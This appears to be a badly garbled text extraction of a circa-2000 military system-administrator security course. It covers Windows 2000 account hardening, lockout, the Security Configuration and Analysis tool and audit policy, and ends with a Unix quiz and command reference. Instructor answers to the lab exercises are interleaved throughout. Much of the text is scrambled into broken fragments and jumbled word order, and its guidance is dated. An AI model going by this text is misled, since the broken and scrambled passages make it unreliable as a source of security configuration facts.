has been set, the complete path may be displayed. 
• This setting makes sure that there is a valid executable 

.scr file defined. 
 

3-1

Unnecessary Accounts 

• Remove inactive accounts that exceed 45 days
isable any non-active accounts
elete user accounts before departure.
se “usrstat” to display the last login for each user 

• D
• D
• U

in a given domain

 
 
Dormant Accounts 

Vulnerability Countermeasure 
Dormant Accounts � 1. Disable accounts that have not been logged into within 

Kelly Larsen
SAS4 Exercise B, step 8 answers:  yes 

Kelly Larsen
SAS4 Exercise B, step 9 answers:  yes; the Audit Account Management and Audit Directory Service Access are not defined.


Kelly Larsen
SAS4 Exercise B, step 10 answers:  yes
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y
into
 

Computers. 
• Right click on a user account. Click on properties then 

 account tab. 
• Under account expires click on “End of:” Use drop 

down box and choose a date 45 days from the current 
ount has reached the date you specified 

it will be disabled. 

Note: Use usrstat.exe to display the last login for each user in a given 

• Must have NT 4.0 resource kit loaded. 

his check. 
in administrator account 

• The built-in guest account 
account (used with IIS or Peer 

Web Services) 
• Accounts that are less than 45 days-old 

• Disabled Accounts 

ma  provide doorways 
 a system.   

the past 45 days. 
• Though there is currently no mechanism for 

deactivating user accounts, especially if the user has 
not logged in after a specified amount of time. You 
can however age an account and specify a time frame 
for the user account to be disabled.  

• I. E. In the MMC snap in Active Directory Users and 

click on

date. Once acc

 

domain.  

 
 

Note: The following accounts are exempt from t
• The built-

• The “IUSR”-guest 

• Application Accounts 

 
 

3-1

Administrator & Guest Accounts

• Rename the administrator and guest account
• Establish decoy accounts named “Administrator” 

and “Guest” with no privileges.
• Review the event log regularly for attempted 

 

access to these accounts

 

Rename Administrator Account 
Vulnerability Countermeasure 

Kelly Larsen
SAS4 Exercise B, step 11 answers:  5120 KB;  512 KB


Kelly Larsen
SAS4 Exercise B, step 19 answers:  no


Kelly Larsen
SAS4 Exercise B, step 20 answers: no



Kelly Larsen
SAS4 Exercise B, step 21 answers:  no  ;  no



Kelly Larsen
SAS4 Exercise B, step 22 answers:  5120kb ; they match
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W MSG DTG 

A

dministrator account.  

c
omp

by a
methods. IE. They 
could u
client s
to enum
Active 
of the e
nd groups could be 

� 1. Rename the administrator account to a non-obvious 
in," "root, " etc.) 

accounts by using the passprop utility. 
ocal computer's Administrator account. 

te: None of these countermeasures avoid a SID search for 
r’s account. 

IA
042100Z Mar 99 Fm name (e.g., not "adm
ACERT Ft Belvoir 

.   
� 2. Enable account lockout on the real Administrator 

V
D. Rename the � 3. Disable the l
a
 

  
No

Ha kers will try to 
romise the 

the Administrato
c
administrator account 

 variety of 

se a LDAP 
uch as ldp.exe 
erate the 

Directory. All 
xisting users 

a
enumerated with a 
simple LDAP query. 
 

Administrator’s Group 
Vulnerability Countermeasure 

Th  more accounts that � 1 LIMIT e
re members of the 

or r 
cess 

ands. 

the membership of the Administrator group. 
. 

 

a
administrator’s the  
m e chances fo
administrative ac
can fall into the wrong 
h
 

Everyone Group 
Vulnerability Countermeasure 

The everyone group is 

o
n

ember of the 

h
group is granted full 
ontrol to an object, 
en ANY account 

including the guest 

a global or universal 
gr up and is very 

a gerous because d
every account is a 
m
Everyone Group.  
W en the Everyone 

c
th
(

� 1. REPLACE the “Everyone” group with “Authenticated 

 
 
 

 
Note: By doing a fresh install

Users” 
 

 
 

 of W2K the “Everyone group” 
for the most part      has been replaced with “ 
Authenticated Users”. If you do an upgrade then you will 

Kelly Larsen
SAS4 Exercise B, step 39 answers:  yes;  yes
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 th

he authenticated users 

e 

have to go through and manually remove and replace 
those items. 

 
 HQ DA SAIS-IAS message DTG 060048Z MAR 

99 all 
 

account) has full access 
to e object.  
 
Note:          IAW
T
group is controlled by          guest accounts shall be disabled.
th SRM and the 
ystems account. s

 

Set Account Lockout Policy

• Account lockout feature 
– disables account after an administrator-

specified number of logon failures.

automatically activated after 10 minutes when a 

• E

 
Accou

• Password Protected Screensavers will be 

terminal is left unattended
nable lockout after 3 failed attempts

3-1

 

nt Lockout Configuration 
Vulnerability Countermeasure 

Intruder will attack 

et
t

sernames and guessed 

o

ISA standards. 

� 1. Minimize the number of attempts a User can make when 
Use MMC to configure account attributes 

 
• Select “Start” and “Run” from the desktop. 

e “mmc.exe” in the Run dialog. 
enu bar. 

p-in” from the drop-down 
menu. 

• Click the “Add” button on the Standalone tab. 
Select the “Group Policy” snap-in and click the 
“Add” button. 

• Insure that “Local Policy” is in the Group Policy 
d click the “Finish” button. 

Click “Close”. 
Click “OK”. 

tree window. (Professional & Server) 
 “Windows Settings” object. 

Expand the “Security Settings” object. 
• Expand the “Account Policies” object and select 

icy. 

systems by a variety of logging in.  
m hods.  One such 

e hod is to bombard m
the computer with • Typ
u
passwords via a 

• Select “Console” from the MMC m
• Select “Add/Remove sna

pr gram.   
 
Note: Conforms to • D

Object line an
• 
• 
• Expand the “Computer Configuration” object in the 

• Expand the
• 

“Account Lockout Pol

Kelly Larsen
SAS4 Exercise B, step 61 answers:  no;  42


Kelly Larsen
SAS4 Exercise B, step 62 answers:  no effect
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• Set Account lockout threshold three attempts or less. 
 
 

Kelly Larsen
SAS4 Exercise B, step 80 answers:  yes;  90 days;  When you import a template into the database, it will automatically update values in the database and computer.  Once you have used a database to configure the system, any update to it via importing templates will update the computer settings.  
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working security database, analyze 
tem s rity Configuration and Analysis tool offers the ability to configure 

s, and resolve any discrepancies revealed by analysis. This tool is located on the 
e. This lab shows you how to use the Security Configuration and Analysis 

l Info section, which follows the PE. Please perform the following 
ps on

 
Accessing the Security Configuration and Analysis Console 
In this exercise you access the Security Configuration and Analysis console, the main tool for using the Security 
Configuration and Analysis tool.   
 
To access the Security Configuration and Analysis console  

 1. Click Run, type mmc, and then click OK.  
 2. On the Console menu, click Add/Remove Snap-In, and then click Add.  
 3. In the Add Standalone Snap-In dialog box, select Security Configuration and Analysis, and then click Add.  
 4. Click Close, then click OK.  
 5. On the Console menu, click Save.  
 6. In the File Name box, type security config & analysis to name this console and click Save.  
 7. On the console menu, click exit. 
 8. To verify that the console appears on the Administrative Tools menu, click start->programs->admintools. 
 9. Does the security config & analysis snap-in appear as a menu item?   

____________________________________________
____________________________________________
_________________________________________ 

 

Setting a Working Security Database 
In this exercise you determine the working security database to use.  To set a working security database  
 

 1. Click Start->Programs->Admintools->Security Config & Analysis. 
 2. In the Security Configuration and Analysis console, right-click Security Configuration and Analysis.  
 3. Click Open Database.  
 4. In the Open Database dialog box, in the File Name box, type new for the new personal database file name, then click 

Open.  
 5. In the Import Template dialog box, select the "securedc" security template to load into the security database, then 

click Open.  
 
The "new" database is now the working security database, and it contains the "securedc" security template. 
 
Analyzing System Security 
In this exercise you analyze system security, comparing the settings in the security template securedc with the security 
settings currently running on your system.  To analyze system security  
 

 1. Right-click Security Configuration and Analysis, then click Analyze Computer Now.  
 2. In the Perform Analysis dialog box, verify the path for the log file location, then click OK.  (accept the default 

location) 
 3. The different security areas are displayed as they are analyzed. 

 

 

Practical Exercise SAS-4A 
Exercise A 
 

 and Analysis console, set a In this lab you will access the Security Configuration
sults.  The Secusys ecurity, and then view the re
tsecurity, analyze security, view resul

Security Configuration and Analysis consol
console.  For more clarification, see the Additiona
ste  W2K Server. 
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Viewing Security Analysis Results 
 this exercise you view the security analysis results.  To view security analysis results  

 1. In the Security Configuration and Analysis console (left panel), nd Security Configuration and Analysis.  
 2. Expand the Account Policies node, then click the Password Policy security area.  
 3. In the details pane, what is indicated in the Policy column?  In the Database Setting column?  In 

the Computer Setting column? 

________________________________________________
________________________________________________
__________________________________________ 

 
 4. In the Policy column, what does the red X indicate? What does the green check mark indicate?  What would the 

absence of an icon indicate? 
____________________________________________________________________
_____________________________________________________
_______________________________________________ 

 
 5. Wait for instructor review. 

In
 

expa

_

 
 
Additional Info: 
 
How the Security Configuration and Analysis Console Works 
The  Security Configuration and Analysis console uses a database to perform configuration and analysis functions. The 
Security Configuration and Analysis database is a computer-specific data store. The database architecture allows the 
use of personal databases, security template import and export, and the combination of multiple security templates into 
one composite security template that can be used for analysis or configuration. New security templates can be 
incrementally added to the database to create a composite security template; overwriting a template is also an option. 

ou can also create personal databases for storing your own customized security templates. 

tion 
tion and Analysis console can be used to m security. Through its use of 
 can import security templates created w lates console and apply these 

 for the local co em security with the levels specified 

stem and applicat ample, immediate 
ion or network iss  requir e temporarily.  

irement is finished, the ersed. This t a computer may 
irements for enterprise

nd Analysis cons uick secu e 
re presented alon c s or re  to highlight 

current settings do not ma Security C n and Analysis 
 resolve any discrepan

les an administrator to t ecurity on each computer as part of 
ment program. Analysis is highly specified and information about all system aspects related to 

Y
 
Security Configura
The Security Configura

al databases, you
 configure local syste
ith the Security Tempperson

templates to the GPO
in the template. 
 

mputer. This immediately configures the syst

Security Analysis 
The state of the operating sy
resolution of an administrat

ions on a computer is dynamic. For ex  to enable  
ue, security levels may occasionally be ed to chang

After this security requ
no longer meet the requ
The Security Configuration a
analysis, recommendations a
any areas where the 

 temporary change may not be rev  means tha
 security. 

 perform a q rity analysis. In thole allows administrators to
gside current system settings, and i on marks are used
tch the proposed level of security. onfiguratio

also offers the ability to
Regular analysis enab
an enterprise risk manage

cies revealed by analysis. 
rack and ensure an adequate level of s
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lts. Th ost important, to 
may oc

n and Analys
s for using Security Configu

ity Conf uration and Analysis console  
urity database  

plate into a security database  
urity  

lts  
g system security  

curity database settings to a security template 

s Results 
on and Analysis console displays the analysis results organized by security area with visual 

 security policy in the security area, the current database and computer 
splayed. 

pane, the Policy column indicates the policy name for the analysis results, the Database Setting column 
your te curity level in 

A red X indicates a difference from the database configuration.  
heck mark i
ans that th

• No icon indicates t  not 
analyzed. 

 
 

 
 
 
 

 

security is provided in the resu
detect any security flaws that 
 
Using Security Configuratio

A. The task

is enables an administrator to tune the security levels, and m
cur i en th  system over time. 

is 
ration and Analysis are 

B. Accessing the Secur
C. Setting a working sec
D. Importing a security tem
E. Analyzing system sec
F. Viewing security analysis resu
G. Configurin
H. Exporting se

 
Viewing Security Analysi
The Security Configurati
flags to indicate problems. For each
configuration settings are di
 
In the details 

ig

indicates the security value in 
the system.  

• 
•

mplate, and the Computer Setting column indicates the current se

 A green c
• A “?” me

ndicates consistency with the database configuration.  
e item defined is not on that system. 

hat the security policy was not included in your template and therefore
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Practical Exercise SAS-4B
Exercise B 
 

his PE provides the student with familiarity with the security database and templates snap-in.  The student will learn 
e relationship between the security database settings and the current computer settings and how you can modify 

settings in the current security database directly, by modifying templates, and by importing templates. 
 

 1. Click Start->Programs->Administrative Tools->Security Config & Analysis. 
 2. In the Security Configuration and Analysis console, right-click Security Configuration and Analysis.  
 3. Click Open Database.  
 4. In the Open Database dialog box, select the "new" personal database file, then click Open.   The "new" database 

is now the working security database, and it contains the "securedc" security template. 
 5. Right-click Security Configuration and Analysis, then click Analyze Computer Now.  
 6. In the Perform Analysis dialog box, verify the path for the log file location, then click OK.  (accept the default 

location) 
 7. Expand Security and Configuration Analysis and Account Policies, then click the Password Policy security area.  
 8. Are there places where the Database Setting column differs from the Computer Setting column?   

____________________________________________
____________________________________________
_________________________________________ 

 
 

 9. Expand local policies and click on audit policy.  Are there differences between the database setting and the 
computer setting?   

____________________________________________
____________________________________________
_________________________________________ 

 
 

 10. Click on user rights.  Are the computer settings more stringent than the database setting?  
 

____________________________________________
____________________________________________
_________________________________________ 

 

T
th
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 11. Expand event log.  Click on settings for event log.  What is the value for the database security log size?   What 
is the value for the computer security log size?  

____________________________________________
____________________________________________
_________________________________________ 

 
 

 12. Right click security configuration and analysis 
 

 13. Select "configure computer now". 
 

 14. Accept the default error log location by clicking "ok". 
 

 15. Right click on "security configuration and analysis" and select "analyze computer now". 
 

 16. Accept default location and select "ok". 
 

 17. Expand account policies and click on password policy.
 

18. Do the database settings and the computer settings differ now?.  _________________ 
 

dit policy.   

tings and the c puter settings differ no

______ 

hts.  Have the setting mputer update the policy on the computer 
ot define it? 

______________________________ _________________________________________ 
 

 22. Expand event log and click on se g at is the computer setting value for the size of the 
security log?  How does it compare t e

 
______________________________ _____________________________________ 

 
 23. Go to account policies and click a

 
 24. Double click on "minimum p

 
 25. Click the Define This Policy

 
 26. Enter a new value of 20 for t inimum password age value. then click OK.  This will change the value in the 

database. 

 ckout policy 

nt lock

e This Policy In T

 login attempts to 3 an

 

 

 19. Expand local policies and click on au
 

 2
 

___________________
 

 21.  Click on user rig
if the database does n

 

0. Do database set om w?  

s changed at all?  Does the co

__________________

ttin s for event log.  Wh
o th  database setting? 

______________________

on p ssword policy 

assword age" 

 In The Database check box to allow editing, if not selected 

he m

 
2 t lo7. Click on accoun

 
 28. Double click on accou

 
 29. Click the Defin

 
 30. Set invalid

out threshold.   

he Database check box to allow editing. 

d click OK. 
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 31. Click OK on the Suggested Value Ch

 32. Take a couple of minutes and dou  r value.  
 

 33. Right click on security configuration  
 

 34. Select configure computer now 
 

 35. Accept the default error log location b
 

 39. Expand account policies and clic y.  Has the minimum password age changed on the 
computer settings?  Click on account k ockout threshold changed to match the 
database value?  

___________ _____
___________ __

_______________________________ 
y confi

template" 

plate to box, type

onfiguration &

pe mmc and

 45. In the console menu, select add snap-in
 

 46. Select add 

 47. Select "security templates" and click add 
 

 48. Click close and then OK 
 

 49. In the console menu choose "save as"   
 

 50. In the file name block, type security templates and click save 
 

 51. Close console window, if asked to save, choose no. 
 

 52. Select Start->Programs->Administrative Tools->security templates 
 

 53. Expand security templates 
 

 54. Expand  \WINNT\Security\Templates 
 

 55. Expand new.  If you expand and look at the policy values, you will see they match the ones you just configured 
in the database.   

 

 

 
ange Window. 

ble click on some other policies and see how easy it is to modify thei

& analysis

y clicking OK 

k on password polic
loc out policy.  Has the account l

____________________________
_______________________________

__________
 

 40. Right click on securit
 

 41. Select "export 
 

 42. In the export tem
 

 43. Close the Security C
 

 44. Select Start->Run , ty
 

guration & analysis 

 new for the file name and click on save. 

 Analysis window 

 hit enter 
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licy 

imum pas

 the Define This Policy T
 

 60. Set the password to expire in 0 
 

 61. Right click on "new" and choo
 

 62. Close the security templates 
 

 63. Select Start->Programs->Admini ation & analysis 
 

 64. Right click on security confi at
 

 65. Select "new" and hit enter. 
 

 66. Expand account policies and
 

 67. Did the maximum password r ?   

___________________________________________ 
 

 68. What does this tell you about editing an exported template?   

____________________________________________
__________________________________________ 

 
 69. Right click on security configuration & analysis 

 
 70. Select “export template” 

 
 71. Enter new1 as the file name and click save 

 
 72. Select Start->Programs->Administrative Tools->security templates 

 
 73. Expand security templates 

 
 74. Expand /WINNT/Security/Templates 

 
 75. Expand new1 

 
 76. Expand account policies and click on password policy 

 
 77. Double click maximum password age 

 
 78. Click the Define This Policy In The Database check box to allow editing. 

 79. Set the password to expire in 90 days and click OK 
 

 80. Right click on new1 and select save. 
 

 81. Close the security templates window and if asked to, do not save 

 56. Expand account policies 
 

 57. Select password po
 

 58. Double click "max
 

 59. Click

sword age" 

 In he Database check box to allow editing. 

 15 days and click OK 

se save. 

window but do not save settings 

strative Tools->security configur

gur ion and analysis and select "open database". 

 select password policy. 

 age value change?  What is the value for both the database and the compute
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 analysis window and right click on security configuration & analysis 

 "new1" and click open 

 

_____________________
_________________

 

 88. Wait for instructor review 

Ad

 82. Select the security configuration &
 

 83. Select import template. 
 

 84. Select
 

 85. Expand account policies and select password policy 
 

 86. Has the maximum password age changed for both the database and computer value?  what is the current value? 
What does this tell you about importing templates?  

_______________________
___________________________
_________________________________________

 
 87. Close all windows. 

 

 
ditional Info: 

figuring Sys C
S

on tem Security 
u o resolve any discrepancies revealed by analysis, including the 

lo
the values flagged or not included in the configuration if you determine the 
due to the context (role) of that computer  

he database as the new database 

rocess and load multiple templates. The database will merge the various templates to 
create one composite template, resolving conflicts in order of import; the last one imported takes precedence when 

n choose Configure System Now to 

PORTANT  

ges are made to the stored template in the database, not to the security template file. The security 

 security template is a physical representation of a security configuration; it is a file where a group 
udes a set of security templates, each based 

n the role of a computer. The templates range from security settings for low security domain 
n be used as provided, modified, or serve as a 

s

ec rity Configuration and Analysis offers the ability t
l wing: fo

• Accepting or changing some or all of 
local system security levels are valid 

• Configuring the system to the original database configuration values if you determine the system is not in 
compliance with valid security levels  

• Importing a more appropriate template, for the role of that computer, into t
configuration and applying it to the system 

• You can repeat the import p

there is contention. Once the templates are imported to the database, you ca
apply the stored template (database configuration) to the system. 

IM

These chan
template file will only be modified if you either return to Security Templates and edit that template or export the 
stored configuration to the same template file. 

 
 
Security Templates Snap-In 
A
of security settings may be stored. Windows 2000 incl
o
clients to highly secure domain controllers. They ca
ba is for creating custom security templates. 
 
 
 
 
 

gvh
PE SAS-05 Step 11.  account management ; directory service access
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 se late is a physical file representation of a security configuration, and can be applied to a local computer 
m ry service. When you import a security template to a 

PO, Group Policy processes the template and makes the corresponding changes to the members of that GPO, which 
y

he security Templates snap-in allows you to perform a variety of tasks: 

• mplate  
 Delete a security template  
• 
 Set a description for a security template 

Using the security Templates Snap-In 
curity tempA

or i ported to a Group Policy Object (GPO) in the Active Directo
G
ma  be users or computers. 
T
• Customize a predefined security  template  

Define a security te
•

Refresh the security template list  
•

Kelly Larsen
SAS-05 step 20.  yes


gvh
PE SAS-05 Step 24. Information, warning, error, success audit, failure audit .


gvh
PE SAS-05 Step 26. 512KB


gvh
PE SAS-05 Step 27/28.  No, You must use a setting that is devisable by 64.  (i.e. 64, 128, 192, 256, 320, 384, 448, 512) , 128 KB

 



PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-122 

 

3-1

W2K different than NT4

System Administr
Secur

ator/Network Manager 
ity Course

• Capabilities are comparable

ts that can be reported are similar

• The mechanisms that enable auditing are slightly 
different with W2K directory services bringing 
new auditing capabilities

• Basic even

W2K Checklist 
Auditing/Logging

  

3-1

Why is Auditing Important?

 

• It is the LAW.
• Helps you maintain a watchful 

eye, potentially alert
to security issues be

ing you
fore they 

 

become a problem.

DISC4 Policy 
Vulnerability Countermeasure 

IAW MSG DTG 
042100Z Mar 99 Fm 
ACERT Ft Belvoir VA.   
K. Enable auditing for 
the following events:  
ENSURE that the 
minimum required 
auditing is enabled per 
DISC4 policy.   
 
Enabling system 
auditing can inform 

� 1. Configure the following events: 
 

EVENT                 SUCCESS               FAILURE 
Audit logon events          X            X 
Audit object access        -----           X 
Audit privilege use          X           X 
Audit account               X                X 
    management            
Audit policy changes       X           X 
Audit system events        X           X 
Audit process tracking   ------           X 

 

gvh
PE SAS-05 Step 39.  No.


gvh
PE SAS-05 Step 32. No.


gvh
PE SAS-05 Step 46. Yes.
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you of actions that pose 

possibly detect security 

" capability 
 
n" ca

fter t
there
ays 

Note: Setting up auditing is a two-part process: 
udit policy.  Enables the auditing of objects 

but does not activate auditing of specific objects 
2. Enable auditing of specific resources. 

 

security risks and 1. Set the a

breaches. 
Note: that auditing is a 
"detection
rather than
"preventio pability. 
It will help you 
discover security 
breaches a hey 
occur and fore 
should alw be 
considered in addition 
to various preventive 
measures. 
Hacker-type break-in Enable failure auditing for log on and log off events. 
using random 
passwords 
Break-in using stolen Enable success auditing for log on and lo
password entries will not distinguish between the real users and the 

phony ones. What you are looking for here is unusual activity 

g off events. The log 

on user accounts, such as logons at odd hours or on days 
when you would not expect any activity. 

Misuse of 
strative 

Enable su
group maa

p
dmini

 by 
 use

nagement, for security policy changes; and for 
 Because of the 
d, Windows 

2000 does not normally audit the use of the Backup Files And 
ts. 

nt 
Environment," explains how to enable auditing of the use of 
these rights.) 

rivileges
authorized rs 

restart, shutdown, and system events. (Note:
high volume of events that would be recorde

ccess auditing for use of user rights; for user and 

Directories and the Restore Files And Directories righ
Appendix B, "Security In a SOFTWARE Developme

Virus outbreak Enable success and failure write access auditing for program 
files such as files with .exe and .dll extensions. Enable 
success and failure process tracking auditing. Run suspect 
programs and examine the security log for unexpected 
attempts to modify program files or creation of unexpected 
processes. Note: that these auditing settings generate a large 
number of event records during routine system use. You 
should use them only when you are actively monitoring the 
system log. 

Improper access to 
sensitive files 

Enable success and failure auditing for file- and object-access 
events, and then use File Manager to enable success and 
failure auditing of read and write access by suspect users or 
groups for sensitive files. 

Improper access to Enable success and failure auditing for file- and object-access 
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nts, and then use Print Manager to enable success and 
failure auditing of print access by suspect users or groups for 
the printers. 

printers eve
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3-1
3-1

Three broad categories can be 
monitored

• Object Access
– Files and Folders
– Printers

• Process Tracking
d 

• Logon/logoff 

– Registry
– Directory Access

• Investigate all failed login attempts or faile
account lockouts

 

Don’t Over Audit

• B
f

• B  possible aspect of auditing, you 
w a server that does little else 
exce

y default, none of Windows 2000 auditing 
eatures are turned on.
y enabling every
ould end up with 

pt auditing.

 

3-1

Set Up an Auditing Policy

 

• Events to Audit:
– Account Login(logging in/out)
– Account Management
– Directory Service Access
–
–

Logon Events
Object Access

– Policy Change
– Privilege Use
– Process Tracking
– System Events

 
Setting up an Auditing Policy 

Vulnerability Countermeasure 
With

di
out proper 

ting techniques, 

 effectively. 

� 1.  General Categories to consider when setting up a secure 
server auditing policy 

• Account Management 
• Directory Service Access 
• Logon Events 
• Object Access 
• Audit Policy Changes 

• Process Tracking 

au
you'll never know if 
your security plan is 

• Account Logon Events 

working
 

• Use of Privileges 
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• System Events 
Note: 
Guide for setting up an audit policy. 

4921,00.htm 
 

 
Enabling Auditing 

Vulnerability Countermeasure 
Failure to enable � 1 To activate auditi
success/failure 

n cause hacki
auditing 
ng 

ng on a standalone machine, follow 
these steps:  

• Log on as the administrator of the local workstation. 

Local Security Settings window’s console 
tree, double-click Local Polices and then click Audit 

n the 
y. 

r computer. 

ca
activities to go 
undetected. 
 

• Click the Start button, point to Programs, point to 
Administrative Tools, and then click Local Security 
Policy. 

• In the  

Policy. 
udit, and then, o• Select the type of event to a

, click SecuritAction menu
• Select the Success check box, the Failure check box, 

r both. o
• Click OK. 
• Restart you

Note: 
This setting only affec
auditing on a domain 

ts the standalone system.  To set 
controller use the countermeasure in 5.4 

 
Enabling Group Policy 

Vulnerability Countermeasure 
Failure to enable � 1.  To enable which categories o

oup Policy Snasuccess/failure auditing you use the Gr
can cause hacking 
activities to go 
undetected.  Group • Click the add button. policies may be set at • the local, site, domain Find the Group Policy Snap-in from

and organizational unit Stand
• Acceplevels. 

f events can be audited, 
p-in with the MMC. 

• Click Start, Run, and enter mmc. 
• Select Add/Remove Snap-in from the Console menu. 

 the "add 
alone Snap-in dialog box" then click add 
t the default (local computer) for where the 

 Object will be stored and click the Group Policy
finish button. 
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3-1
3-1

Windows 2000 Event Logs
Troubleshooting

• Event Viewer displays detailed information about 

 time 
, 

.

system events

• Information includes the event type, date and
, Event IDthe event occurred, source, category

user logged on, and computer involved

 

• All W2K servers have at least three log files:
– System Log
– Application Log
– Security Log

• W2K may have an additional three log files:
– Directory Service
– DNS Server
– File Replication Service

 
 
Event Log Configuration 

Vulnerability Countermeasure 
Improper configuration of � 1. Open the Compute
the Event viewer/log files 

• Right-click  the "mcan degrade monitoring 
• Select manage from the drop down menu. capabilities. 

r Management Console 
y computer" icon on the desktop 

stem Tools 
ent Viewer 

 event log. Perform the following 
 event log. 

enu 
aximum log size and 

g overwriting. 
If the server or workstation shares resources, click the 

ked "do not overwrite events".  If the 
 not share resources, click the radio 

nts older than 30 days". 
r servers and workstations that share resources, enter 

KB" for the maximum log size value.  
esources can be set to "10240 

• Expand Sy
Expand ev• 

• Right-click the
procedure for each

• Select properties from the pop up m
ing the m• Review the fields identify

the event lo
• 

radio button mar
oesworkstation d

button marked "overwrite eve
Fo
"4194240 
Workstations that do not share r
KB".  
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3-1

Safeguard Your Log Files

• Review Audit trails at a min weekly. (not enough)

machine separate from where 
e event took place

 

• Create an “Audit Account” 
• Log all access and access attempts
• Store log files on a -

th
• Retain classified and sensitive IS audit files for 

1 year and 5 years for SCI systems
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2K Auditing & Logging 

hen you  auditing policy 
ance an uditing turned off.  

uditing informatio vidually enable those items you wish to capture data about.  
uide you 

s 2000 S

s->Admintool

urity Configuration d Analysis console, right-click Security Configuration and Analysis.  

 4. Click Open Database.   In the Open Database dialog box, in the File Name box, type new2 for the new personal 
en click Open.  

 5 plate dialog box, select the "basicsv" se  into the security database, then 
ew2" databas

onfigura  

ure computer no

error log lo tion by clicking "ok".  Close configuration and security analysis console. 

->Programs->Administrative Tools->Local Security Policy 

s 

.  Which policies are enabled by default?                

W

Practical Exercise SAS-5A 
Exercise A 
 
Various steps are involved w
that does not degrade perform
In order to capture any a
Your auditing policy will g
 

 1. Login to the Window
 

 2. Click Start->Program
 

 3. In the Sec

 set up a secure server.  One of the most important is arriving at an
d meets your security needs.  By default, Windows 2000 has a

n, you must indi
as you select those events to audit. 

erver  as the administrator 

s->Security Config & Analysis. 

an
 

database file name, th
 

. In the Import Tem curity template to load
click Open.  The "n
template. 

 
 6. Right click security c

 
 7. Select "config

 
 8. Accept the default 

 
 9. Select Start

 

e is now the working security database, and it contains the "basicsv" security 

tion and analysis 

w". 

ca

 10. Expand Local Policie
 

 11. Select Audit Policy
 
 
 
                     
You should see a column la
local settings and on

beled local settings.  In the case of inherited policies, you may see two columns, one for 
e for effective settings.  The local settings pertain to settings established on the computer itself.  

he effective settings are the settings it inherits as a member of the domain.  If the computer is not a member of a 
ill be the effective settings.  If the computer is a member of a domain and the effective 
 the local settings say success/failure ur.                                  

udit Logon

ss and fa e

 on Audit Objec

th Success and fa

t Privile  Use and select security 

T
domain, the local settings w
setting  ands say no auditing , no auditing will occ
 

 12. Right click on A
 

 13. Click on both succe
 

 14. Right Click
 

 15. Click on bo
 

 16. Right click on Audi
 

 Events and select security 

ilur  and then click ok 

t Access and select security 

ilure and then click ok 

ge
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 17. Click on failure and then click ok 

nts and select security

d then cli

ting i s become 

__________________________________ 

ms->Administrative Tools->Event Viewer 

e Security Log choice in the left panel 

23. Choose properties 

 will see the various eve  can keep the size of your log 
o not filter fo

___ _____
___ _______

__________  
 
 

 25. Click on the General tab. 
 

________________

 
 18 Audit System Eve. Right click on  

 
 19. Click on failure an

 
 20. Close Local Security Set

effective?   
 

___________________
 

 21. Select Start->Progra
 

 22. Right Click on th

ck ok 

s w ndow and then reopen Local Security Policy.  Have your change

 
 

 
 2 e filter tab you4. If you click on th

sing t
nts the log looks for.  You

down by choo

________
________
_

r certain events.  What events can you filter on?   

____________________________
__________________________
______________________________

 26. What is the default size setting?  ________________________  

 27. Change the log file size setting to 100KB and click Apply.  Were you successful?     
 

 

et the log size to 100KB, what 
se as a settin

__ ____
_______ ___________

_____________ _________________ 
 

 29.Select OK and close all windows 
 

 30. Logoff as the administrator  
 

 31. Log on as labuserXX but do ord (just hit enter) 
 

 32. Repeat the previous step, four mo
 

 33. Logon as labuserXXa with th
 

 34. Click on Start and select pro
 

 35. Select administrative tools 

 
 2 riction when setting the log file size?  W8. What is the rest

id the system choo
hen you attempted to s

d

_________
______

g?  

_____________________________
____________________
___________

 not provide a passw

re times 

e proper password 

grams 
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 36. Select Event Viewer 

 37. View the Security Log.  Were you successful?   ________ 
 

 38. Close the Event viewer Window. 
 

 39. Double click on the time display in the lower right portion of the screen.  Will it allow you to change the time?  
_________ 

 
 40. Logout as labuserXXa  

 
 41. Login as the administrator but do not provide a password (just hit enter) 

 
 42 Repeat the previous step, four more times. 

 
 43. Login as the administrator with the proper password 

 
 44. Click Select Start->Programs->Administrative Tools->Event Viewer  

 
 45. View the Security Log. 

 
 46. Can you identify the entries that were generated as a result of the bad login attempts, successful login attempts, 

and failure of privilege use? 
 

______________________________________________ 
 
 

 47. Right Click on a few of the failure and success audit event numbers event and view the properties.  You should 
see a fairly understandable explanation of the event. 

 
 48. Close the event viewer. 

 
 49. Wait for the instructor to review the exercise. 
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Welcome to Unix Security………. 
 

e of the root account you stop hacker brute force attacks. 
 
2.  T F System accounts are logged into like normal accounts but are used as 
                      Administrator accounts. 

computers and users. 

in  

If a user ran the chown command, a user could assign someone else ownership of 

(Circle the correct answer) 
 
1.  T F By changing the nam

  
 
3.  T F Unix has no logging enabled by default. 
 
4.  T F Both the root administrator and regular users can establish trusts with other  
             
 
5.  T F Unix by default, requires the use of uppercase, lowercase, symbols, and numbers 
             password construction. 
 
6.  T F Viruses cause a lot of problems for Unix administrators. 
 
.  T F 7

                         a file. 
 
8.  T F By enabling process accounting, you will log all the commands that are ran and  

            whom they were ran by.  
 
9.  T F Unnecessary services are turned off in the /etc/services file. 
 
 
10. T F The /etc/ftpusers file contains the list of accounts that can utilize ftp. 
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NIX Command Reference List 

 
 by holding down the CTRL key 
on ^x, where x is the 

haracter. You must finish all UNIX commands by pressing the RETURN key, which 
ssortment of flags/options that are 
t program flags/options 

Con
If you are using another computer on the network or on the Internet, and if that 
computer has a telnet command, you can use it to connect to a UNIX host. If the 
other computer is also running UNIX, you can connect using rlogin. If your 
computer offers ssh, the Secure SHell, you can also connect using ssh or slogin. 
 
 
Special Characters 
^c 

s, which cannot be 

 
^z 

Suspends a process (temporarily stops it by putting it in the 
nd") so that you can give other UNIX commands. To resume the 

reground) or %n, where n is the background job number. 
 it undefined), give the command: 

 
^D 

 
^] 

Used to escape out of some commands or processes.  Similar to ^C. 

tput. Thus: 

 
your terminal (standard output), but: 

 

 
out" instead, overwriting and destroying any 

".  

U
 
 
In this section . . . 
Command words and arguments are shown exactly as you type them. Note that most 
are in lowercase. They must be typed that way: UNIX treats uppercase letters as 
different from their lowercase counterparts. Type the punctuation shown, such as
a hyphen or vertical bar. Control characters, typed
hile typing the character, are shown by the notatiw
c
is not shown here. Most commands have an a
not shown.  Use the man page to learn abou
 
Connecting  

necting from Another Computer 

 
Interrupts and aborts execution of the current proces
restarted. 

"backgrou
process, use fg (fo
To disable ^z (make

Ends a telnet session 

 
> 

Writes to the file named to the right of this symbol instead of to 
standard ou

 
cat myfile 

displays contents of "myfile" at 

cat myfile > listout  

copies it to file "list
previous contents of the file "listout
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> 
Appends output to the file named to the right of this symbol. Thus: 

ut 

